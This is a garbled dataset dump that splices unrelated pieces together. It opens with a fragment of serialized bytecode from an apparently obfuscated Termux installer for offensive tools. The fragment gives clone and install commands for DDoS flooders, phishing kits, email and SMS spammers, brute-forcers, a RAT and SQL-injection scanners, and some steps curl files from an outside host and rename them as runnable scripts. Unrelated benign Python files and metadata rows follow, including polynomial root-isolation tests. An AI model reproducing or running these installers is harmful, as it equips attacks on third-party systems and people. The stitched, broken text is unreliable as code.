https://github.com/reverse-shell/routersploit.gits\x0f\x00\x00\x00cd routersploits\x19\x00\x00\x00termux-fix-shebang rsf.pyt\x02\x00\x00\x0021s\x0e\x00\x00\x00Install Xerxess\x11\x00\x00\x00apt install clangs/\x00\x00\x00git clone https://github.com/zanyarjamal/xerxest\x02\x00\x00\x00lss\t\x00\x00\x00cd xerxess\x18\x00\x00\x00clang xerxes.c -o xerxess(\x00\x00\x00Cara Memakainya ./xerxes(nama website)80t\x02\x00\x00\x0022s\x13\x00\x00\x00Install Hash-Busters\x0b\x00\x00\x00apt upgrades8\x00\x00\x00git clone https://github.com/UltimateHackers/Hash-Bustert\x02\x00\x00\x0023s\x10\x00\x00\x00Install LITEDDOSs-\x00\x00\x00git clone https://github.com/4L13199/LITEDDOSt\x02\x00\x00\x0024s\x16\x00\x00\x00Install HakkuFrameworks\n\x00\x00\x00mkdir vasus4\x00\x00\x00git clone https://github.com/4shadoww/hakkuframeworks\x11\x00\x00\x00cd hakkuframeworks\x0e\x00\x00\x00chmod +x hakkut\x02\x00\x00\x0025s\x14\x00\x00\x00Install Admin Finders3\x00\x00\x00git clone https://github.com/Techzindia/admin_penals\x0e\x00\x00\x00cd admin_penals\x1e\x00\x00\x00chmod +x admin_panel_finder.pyt\x02\x00\x00\x0026s\x0f\x00\x00\x00Install EvilURLs\x1f\x00\x00\x00apt install git python2 python3s.\x00\x00\x00git clone https://github.com/UndeadSec/EvilURLs\x0c\x00\x00\x00mv EvilURL ~t\x02\x00\x00\x0027s\x13\x00\x00\x00Install AndroZenMaps\x15\x00\x00\x00apt install nmap curls6\x00\x00\x00curl -O http://override.waper.co/files/androzenmap.txts\x13\x00\x00\x00mkdir ~/AndroZenmaps/\x00\x00\x00mv androzenmap.txt ~/AndroZenmap/androzenmap.sht\x02\x00\x00\x0028s\x0c\x00\x00\x00Install Nmaps\x10\x00\x00\x00apt install nmapt\x02\x00\x00\x0029s\x0f\x00\x00\x00Install Sqlmates\x17\x00\x00\x00apt install python2 gitsA\x00\x00\x00pip2 install mechanize bs4 HTMLparser argparse requests urlparse2s4\x00\x00\x00git clone https://github.com/UltimateHackers/sqlmates\x0c\x00\x00\x00mv sqlmate ~t\x02\x00\x00\x0030s\x11\x00\x00\x00Install Astranmaps\x14\x00\x00\x00apt install git nmaps/\x00\x00\x00git clone 
https://github.com/Gameye98/AstraNmaps\x0e\x00\x00\x00mv AstraNmap ~t\x02\x00\x00\x0031s\x0b\x00\x00\x00Install WTFs\x17\x00\x00\x00apt install git python2s8\x00\x00\x00pip2 bs4 requests HTMLParser urlparse mechanize argparses&\x00\x00\x00git clone https://github.com/Xi4u7/wtfs\x08\x00\x00\x00mv wtf ~t\x02\x00\x00\x0032s\x08\x00\x00\x00Easy Maps\x13\x00\x00\x00apt install php gits-\x00\x00\x00git clone https://github.com/Cvar1984/Easymaps\x0c\x00\x00\x00mv Easymap ~s\x1d\x00\x00\x00cd ~/Easymap && sh install.sht\x02\x00\x00\x0033s\x0c\x00\x00\x00Install XD3vs\x10\x00\x00\x00apt install curls\x81\x00\x00\x00curl -k -O https://gist.github.com/Gameye98/92035588bd0228df6fb7fa77a5f26bc2/raw/f8e73cd3d9f2a72bd536087bb6ba7bc8baef7d1d/xd3v.shs:\x00\x00\x00mv xd3v.sh ~/../usr/bin/xd3v && chmod +x ~/../usr/bin/xd3vt\x02\x00\x00\x0034s\r\x00\x00\x00Install Cripss1\x00\x00\x00apt install git python2 openssl curl libcurl wgets*\x00\x00\x00git clone https://github.com/Manisso/Cripss\n\x00\x00\x00mv Crips ~t\x02\x00\x00\x0035s\x0b\x00\x00\x00Install SIRs\x18\x00\x00\x00pip2 install bs4 urllib2s-\x00\x00\x00git clone https://github.com/AeonDave/sir.gits\x08\x00\x00\x00mv sir ~t\x02\x00\x00\x0036s\x0f\x00\x00\x00Install Strikers4\x00\x00\x00git clone https://github.com/UltimateHackers/Strikers\x0c\x00\x00\x00mv Striker ~s0\x00\x00\x00cd ~/Striker && pip2 install -r requirements.txtt\x02\x00\x00\x0037s\x0c\x00\x00\x00Install DSSSs*\x00\x00\x00git clone https://github.com/stamparm/DSSSs\t\x00\x00\x00mv DSSS ~t\x02\x00\x00\x0038s\r\x00\x00\x00Install SQLivs+\x00\x00\x00git clone https://github.com/Hadesy2k/sqlivs\n\x00\x00\x00mv sqliv ~t\x02\x00\x00\x0039s\x0f\x00\x00\x00Install SqlScans\x13\x00\x00\x00apt install git phps0\x00\x00\x00git clone http://www.github.com/Cvar1984/sqlscans\x0c\x00\x00\x00mv sqlscan ~t\x02\x00\x00\x0040s\x12\x00\x00\x00Install Golden Eyes-\x00\x00\x00git clone https://github.com/jseidl/GoldenEyes\x0e\x00\x00\x00mv GoldenEye 
~t\x02\x00\x00\x0041s\r\x00\x00\x00Install XGanss\x18\x00\x00\x00apt install python2 curls\r\x00\x00\x00mkdir ~/xGanss0\x00\x00\x00curl -O http://override.waper.co/files/xgans.txts\x1d\x00\x00\x00mv xgans.txt ~/xGans/xgans.pyt\x02\x00\x00\x0042s\x17\x00\x00\x00install PlanetWork-DDOSs3\x00\x00\x00git clone https://github.com/Hydra7/Planetwork-DDOSs\x14\x00\x00\x00mv Planetwork-DDOS ~t\x02\x00\x00\x0043s\x10\x00\x00\x00Install BlackBoxs8\x00\x00\x00apt install python2 git && pip2 install optparse passlibs/\x00\x00\x00git clone https://github.com/jothatron/blackboxs\r\x00\x00\x00mv blackbox ~t\x02\x00\x00\x0044s\x13\x00\x00\x00Install Black Hydras\x1d\x00\x00\x00apt install hydra git python2s1\x00\x00\x00git clone https://github.com/Gameye98/Black-Hydras\x10\x00\x00\x00mv Black-Hydra ~t\x02\x00\x00\x0045s\x10\x00\x00\x00Install WPSploits6\x00\x00\x00git clone git clone https://github.com/m4ll0k/wpsploits\r\x00\x00\x00mv wpsploit ~t\x02\x00\x00\x0046s\x0f\x00\x00\x00Install SqlDumps\x13\x00\x00\x00pip2 install googles\x8f\x00\x00\x00curl -k -O https://gist.githubusercontent.com/Gameye98/76076c9a282a6f32749894d5368024a6/raw/6f9e754f2f81ab2b8efda30603dc8306c65bd651/sqldump.pysA\x00\x00\x00mkdir ~/sqldump && chmod +x sqldump.py && mv sqldump.py ~/sqldumpt\x02\x00\x00\x0047s\x11\x00\x00\x00Install WebSploits\x12\x00\x00\x00pip2 install scapys4\x00\x00\x00git clone https://github.com/The404Hacking/websploits\x0e\x00\x00\x00mv websploit ~t\x02\x00\x00\x0048s\x11\x00\x00\x00Install SqlLokmeds\x14\x00\x00\x00pip2 install urllib2s0\x00\x00\x00git clone https://github.com/Anb3rSecID/sqlokmeds\r\x00\x00\x00mv sqlokmed ~t\x02\x00\x00\x0049s\x0e\x00\x00\x00Install Brutals-\x00\x00\x00git clone https://github.com/Screetsec/Brutals\x0b\x00\x00\x00mv Brutal ~t\x02\x00\x00\x0050s\r\x00\x00\x00Install A-Rats(\x00\x00\x00git clone https://github.com/Xi4u7/A-Rats\n\x00\x00\x00mv A-Rat ~t\x02\x00\x00\x0051s\x11\x00\x00\x00Install KnockMails!\x00\x00\x00pip2 install validate_email 
pyDNSs,\x00\x00\x00git clone https://github.com/4w4k3/KnockMails\x0e\x00\x00\x00mv KnockMail ~s\x08\x00\x00\x00Done Ocet\x02\x00\x00\x0052s\x0b\x00\x00\x00Install Hacs)\x00\x00\x00git clone https://github.com/Cvar1984/Hacs\x08\x00\x00\x00mv Hac ~t\x02\x00\x00\x0053s\x12\x00\x00\x00Install Spam Emails9\x00\x00\x00apt install git python2 && pip2 install argparse requestss4\x00\x00\x00git clone https://github.com/p4kl0nc4t/Spammer-Emails\x12\x00\x00\x00mv Spammer-Email ~t\x02\x00\x00\x0054s\x0e\x00\x00\x00Install Rang3rs:\x00\x00\x00apt install git python2 && pip2 install optparse termcolors5\x00\x00\x00git clone https://github.com/floriankunushevci/rang3rs\x0b\x00\x00\x00mv rang3r ~t\x02\x00\x00\x0055s\r\x00\x00\x00Install SH33Ls+\x00\x00\x00git clone https://github.com/LOoLzeC/SH33LLs\x0b\x00\x00\x00mv SH33LL ~t\x02\x00\x00\x0056s\x12\x00\x00\x00social-engineerings\x18\x00\x00\x00apt install python2 perls7\x00\x00\x00git clone https://github.com/LOoLzeC/social-engineerings\x17\x00\x00\x00mv social-engineering ~t\x02\x00\x00\x0057s\x11\x00\x00\x00Install SpiderBots/\x00\x00\x00git clone https://github.com/Cvar1984/SpiderBots\x0e\x00\x00\x00mv SpiderBot ~t\x02\x00\x00\x0058s\r\x00\x00\x00Install Ngroks1\x00\x00\x00git clone https://github.com/themastersunil/ngroks\n\x00\x00\x00mv ngrok ~t\x02\x00\x00\x0059s\x0c\x00\x00\x00Install Sudos\x1d\x00\x00\x00apt install ncurses-utils gits-\x00\x00\x00git clone https://github.com/st42/termux-sudos3\x00\x00\x00mv termux-sudo ~ && cd ~/termux-sudo && chmod 777 *s3\x00\x00\x00cat sudo > /data/data/com.termux/files/usr/bin/sudos2\x00\x00\x00chmod 700 /data/data/com.termux/files/usr/bin/sudot\x02\x00\x00\x0060s\x0e\x00\x00\x00Install Ubuntus2\x00\x00\x00git clone https://github.com/Neo-Oli/termux-ubuntus:\x00\x00\x00mv termux-ubuntu ~ && cd ~/termux-ubuntu && bash ubuntu.sht\x02\x00\x00\x0061s\x0e\x00\x00\x00Install Fedoras\x14\x00\x00\x00apt install wget gitsU\x00\x00\x00wget 
https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.shs\x15\x00\x00\x00mv termux-fedora.sh ~s\x12\x00\x00\x00 Install XAttackers\x14\x00\x00\x00apt install git perls\x1a\x00\x00\x00cpnm install HTTP::Requests\x1b\x00\x00\x00cpnm install LWP::Useragents3\x00\x00\x00git clone https://github.com/Moham3dRiahi/XAttackers\x0e\x00\x00\x00mv XAttacker ~t\x02\x00\x00\x0063s\x0c\x00\x00\x00Install VCRTs:\x00\x00\x00git clone https://github.com/LOoLzeC/Evil-create-frameworks\x1a\x00\x00\x00mv Evil-create-framework ~t\x02\x00\x00\x0064s\x13\x00\x00\x00Install Social-Fishs,\x00\x00\x00apt install python2 git && pip2 install wgets1\x00\x00\x00git clone https://github.com/UndeadSec/SocialFishs\x0f\x00\x00\x00mv SocialFish ~t\x02\x00\x00\x0065s\r\x00\x00\x00Install ECodes+\x00\x00\x00git clone https://github.com/Cvar1984/Ecodes\n\x00\x00\x00mv Ecode ~t\x02\x00\x00\x0066s\x0f\x00\x00\x00Install Hashzers/\x00\x00\x00git clone https://github.com/Anb3rSecID/Hashzers\x0c\x00\x00\x00mv Hashzer ~t\x02\x00\x00\x0067s\x10\x00\x00\x00Install XSStrikes8\x00\x00\x00pip2 install fuzzywuzzy prettytable mechanize HTMLParsers5\x00\x00\x00git clone https://github.com/UltimateHackers/XSStrikes\r\x00\x00\x00mv XSStrike ~t\x02\x00\x00\x0068s\x10\x00\x00\x00Install Breachers\x1e\x00\x00\x00pip2 install requests argparses5\x00\x00\x00git clone https://github.com/UltimateHackers/Breachers\r\x00\x00\x00mv Breacher ~t\x02\x00\x00\x0069s\x0f\x00\x00\x00Install PassGens-\x00\x00\x00git clone https://github.com/Cvar1984/PassGens\x0c\x00\x00\x00mv PassGen ~t\x02\x00\x00\x0070s\x0f\x00\x00\x00Install SpazSmss0\x00\x00\x00apt install git python2 && pip2 install requestss-\x00\x00\x00git clone https://github.com/Gameye98/SpazSMSs\x0c\x00\x00\x00mv SpazSMS ~t\x02\x00\x00\x0099ss\x01\x00\x00Thanks Sudah Pakai Tools Saya & Thanks All Mem CoiZter_Team - Thanks To Ghozt666h05t - XEIT_Cyber - Z#Sec - ./Mr ID - Lazy Time - Mr.-12cb - Mr.Han - Mr.Hellme - M r.EXe - GOODBLIZE - DISCONNECT - 
Mr.4r7Hu12 - Mr.Zin3_Xpl0it - F4ILURE_ID - Epp666h05t - 777GRxZH05T - X999ZploitX - ./XeitGhost - Mr.ZKi - Mr Ez1o - ZsecDet - ./Mr.CROPz - Mr.BrPinG And All Mem CoiZter_Team(\x15\x00\x00\x00R\x0b\x00\x00\x00t\x06\x00\x00\x00base64R\x04\x00\x00\x00R\x00\x00\x00\x00R\x06\x00\x00\x00R\t\x00\x00\x00R\x11\x00\x00\x00t\x06\x00\x00\x00systemt\x01\x00\x00\x00Et\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Yt\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00Ct\x02\x00\x00\x00GRt\x01\x00\x00\x00Tt\x01\x00\x00\x00Ft\x01\x00\x00\x00Kt\t\x00\x00\x00raw_inputt\x0b\x00\x00\x00xeit666h05t(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\t\x00\x00\x00sv\x05\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x02\t\x06\t\x04\r\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x07\x08\x01\x10\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x10\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x
01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x10\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x
01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02''')) | 15,781.666667 | 47,329 | 0.762256 | 9,833 | 47,345 | 3.667751 | 0.100681 | 0.108804 | 0.09957 | 0.11715 | 0.629031 | 0.58999 | 0.577402 | 0.54496 | 0.503979 | 0.428088 | 0 | 0.355264 | 0.02919 | 47,345 | 3 | 47,329 | 15,781.666667 | 0.429389 | 0 | 0 | 0 | 0 | 0.5 | 0.999092 | 0.812166 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 
0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 11 |
43c771fc8862bf7f7dd831f06f11524bcb38ceeb | 196 | py | Python | pineboolib/fllegacy/flparameterquery.py | juanjosepablos/pineboo | f6ce515aec6e0139821bb9c1d62536d9fb50dae4 | [
"MIT"
] | 2 | 2017-12-10T23:06:16.000Z | 2017-12-10T23:06:23.000Z | pineboolib/fllegacy/flparameterquery.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | [
"MIT"
] | 36 | 2017-11-05T21:13:47.000Z | 2020-08-26T15:56:15.000Z | pineboolib/fllegacy/flparameterquery.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | [
"MIT"
] | 8 | 2017-11-05T15:56:31.000Z | 2019-04-25T16:32:28.000Z | """Flparamaterquey module."""
from pineboolib.application.database.pnparameterquery import PNParameterQuery
class FLParameterQuery(PNParameterQuery):
"""FLParameterQuery class."""
pass
| 21.777778 | 77 | 0.785714 | 15 | 196 | 10.266667 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112245 | 196 | 8 | 78 | 24.5 | 0.885057 | 0.239796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
43d9adbbb5040d1c28b04d0a61b25bd07c383123 | 48 | py | Python | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | from collada_wt.collada_wt import create_turbine | 48 | 48 | 0.916667 | 8 | 48 | 5.125 | 0.75 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.911111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
603ef93207cca9b50bdfe4f140fe5b401faccee7 | 117 | py | Python | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | from authz.util.jsonify import jsonify
from authz.util.now import now
from authz.util.expires import user_expires_at
| 29.25 | 46 | 0.846154 | 20 | 117 | 4.85 | 0.45 | 0.278351 | 0.402062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 117 | 3 | 47 | 39 | 0.92381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6074ef926e78cfca58a36a2d51f2b8b5deb3ed4a | 45,250 | py | Python | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | """Tests for real and complex root isolation and refinement algorithms."""
import math
import pytest
from diofant import (EX, QQ, ZZ, DomainError, I, RefinementFailed, ring, sqrt,
subsets)
from diofant.polys.rootisolation import RealInterval
__all__ = ()
def test__real_imag():
    """Split univariate polynomials into real/imaginary parts via ``_real_imag``.

    ``Rx._real_imag(f, _y)`` substitutes ``x + I*y`` for the variable of
    ``f`` and returns the pair (real part, imaginary part) as bivariate
    polynomials in ``x`` and ``y``.
    """
    R, x, y = ring('x y', ZZ)
    Rx = R.drop(y)
    # The symbol standing in for the imaginary coordinate.
    _y = R.symbols[1]
    # Constants have a zero imaginary part.
    assert Rx._real_imag(Rx.zero, _y) == (0, 0)
    assert Rx._real_imag(Rx.one, _y) == (1, 0)
    # Linear polynomials: x + c -> (x + c, y).
    assert Rx._real_imag(Rx.x + 1, _y) == (x + 1, y)
    assert Rx._real_imag(Rx.x + 2, _y) == (x + 2, y)
    assert Rx._real_imag(Rx.x**2 + 2*Rx.x + 3, _y) == (x**2 - y**2 + 2*x + 3,
                                                       2*x*y + 2*y)
    f = Rx.x**3 + Rx.x**2 + Rx.x + 1
    assert Rx._real_imag(f, _y) == (x**3 + x**2 - 3*x*y**2 + x - y**2 + 1,
                                    3*x**2*y + 2*x*y - y**3 + y)
    # The EX (expression) domain is rejected.
    R, x, y = ring('x y', EX)
    Rx = R.drop(y)
    pytest.raises(DomainError, lambda: Rx._real_imag(Rx.x + 1))
    # Gaussian-rational coefficients: I contributes to the imaginary part.
    R = QQ.algebraic_field(I).inject('x', 'y')
    Rx = R.drop(1)
    _y = R.symbols[1]
    x, y = R.to_ground().gens
    f = Rx.x**2 + I*Rx.x - 1
    r = x**2 - y**2 - y - 1
    i = 2*x*y + x
    assert Rx._real_imag(f, _y) == (r, i)
    f = Rx.x**4 + I*Rx.x**3 - Rx.x + 1
    r = x**4 - 6*x**2*y**2 - 3*x**2*y - x + y**4 + y**3 + 1
    i = 4*x**3*y + x**3 - 4*x*y**3 - 3*x*y**2 - y
    assert Rx._real_imag(f, _y) == (r, i)
    # Real algebraic coefficients (sqrt(2)) stay in the real part.
    K = QQ.algebraic_field(sqrt(2))
    R = K.inject('x', 'y')
    Rx = R.drop(1)
    _y = R.symbols[1]
    x, y = R.gens
    f = Rx.x**2 + sqrt(2)*Rx.x - 1
    assert Rx._real_imag(f, _y) == (x**2 - y**2 + sqrt(2)*x - 1, 2*x*y + sqrt(2)*y)
    # Mixed algebraic field QQ(sqrt(2), I).
    K = K.algebraic_field(I)
    R = K.inject('x', 'y')
    Rx = R.drop(1)
    _y = R.symbols[1]
    x, y = R.to_ground().gens
    f = Rx.x**2 + 2*sqrt(2)*I*Rx.x - 1 + I
    assert Rx._real_imag(f, _y) == (x**2 - y**2 - 2*sqrt(2)*y - 1,
                                    2*x*y + 2*sqrt(2)*x + 1)
def test__transform():
    """Checks for the ``_transform`` helper over ZZ.

    ``R._transform(f, p, q)`` evaluates ``q**n * f(p/q)`` (with ``n`` the
    degree of ``f``), so a zero ``f`` always maps to zero.
    """
    R, x = ring('x', ZZ)

    # Zero input maps to zero, whatever the numerator polynomial is.
    for numerator in (R(0), R(1), x + 2):
        assert R._transform(R(0), numerator, x + 1) == 0

    f, p, q = x**2 - 2*x + 1, x**2 + 1, x - 1
    expected = x**4 - 2*x**3 + 5*x**2 - 4*x + 4
    assert R._transform(f, p, q) == expected

    f = 6*x**4 - 5*x**3 + 4*x**2 - 3*x + 17
    p, q = x**2 - 3*x + 4, 2*x - 3
